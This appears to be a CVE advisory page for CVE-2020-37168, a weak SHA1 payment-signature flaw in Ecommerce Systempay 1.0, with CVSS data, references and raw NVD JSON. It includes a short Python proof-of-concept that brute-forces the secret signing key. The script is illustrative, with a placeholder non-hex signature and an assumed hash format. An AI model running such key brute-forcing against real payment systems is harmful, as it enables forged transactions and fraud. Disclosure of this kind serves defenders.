CVE-2020-37168

Description

Ecommerce Systempay 1.0 contains a weak cryptographic implementation vulnerability that allows attackers to brute force the 16-character production secret key used for payment signature generation. Attackers can extract payment form data and signatures from POST requests to the payment endpoint, then use SHA1 hash comparison to iteratively test key candidates until discovering the correct production key, enabling them to forge valid payment signatures and manipulate transaction amounts.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Ecommerce Systempay 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import hashlib
import itertools

# Target signature captured from the POST request
target_signature = "a1b2c3d4e5f6g7h8i9j0"

# Data extracted from the payment form
data_fields = "amount=100&currency=USD&transaction_id=123456"

# Function to generate a candidate key
def generate_keys(charset, length):
    for candidate in itertools.product(charset, repeat=length):
        yield ''.join(candidate)

# Brute force logic
charset = 'abcdefghijklmnopqrstuvwxyz0123456789' # Example charset
key_length = 16

print("Starting brute force attack...")

for key in generate_keys(charset, key_length):
    # Construct the string to hash (algorithm depends on implementation)
    # Assuming format: key + data
    string_to_hash = key + data_fields
    
    # Calculate SHA1 hash
    hashed_signature = hashlib.sha1(string_to_hash.encode('utf-8')).hexdigest()
    
    # Compare with the target signature
    if hashed_signature == target_signature:
        print(f"[+] Key found: {key}")
        break
else:
    print("[-] Key not found in this charset.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2020-37168
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2020-37168
[3] CVE Details https://www.cvedetails.com/cve/CVE-2020-37168/
[4] VulDB https://vuldb.com/cve/CVE-2020-37168
[5] https://paiement.systempay.fr/doc/fr-FR/
[6] https://paiement.systempay.fr/doc/fr-FR/module-de-paiement-gratuit/
[7] https://www.exploit-db.com/exploits/48017
[8] https://www.vulncheck.com/advisories/ecommerce-systempay-production-key-brute-force

Raw JSON Data

JSON

{"cve": {"id": "CVE-2020-37168", "sourceIdentifier": "[email protected]", "published": "2026-05-13T16:16:31.720", "lastModified": "2026-05-13T17:07:21.030", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Ecommerce Systempay 1.0 contains a weak cryptographic implementation vulnerability that allows attackers to brute force the 16-character production secret key used for payment signature generation. Attackers can extract payment form data and signatures from POST requests to the payment endpoint, then use SHA1 hash comparison to iteratively test key candidates until discovering the correct production key, enabling them to forge valid payment signatures and manipulate transaction amounts."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-328"}]}], "references": [{"url": "https://paiement.systempay.fr/doc/fr-FR/", "source": "[email protected]"}, {"url": "https://paiement.systempay.fr/doc/fr-FR/module-de-paiement-gratuit/", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/48017", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/ecommerce-systempay-production-key-brute-force", "source": "[email protected]"}]}}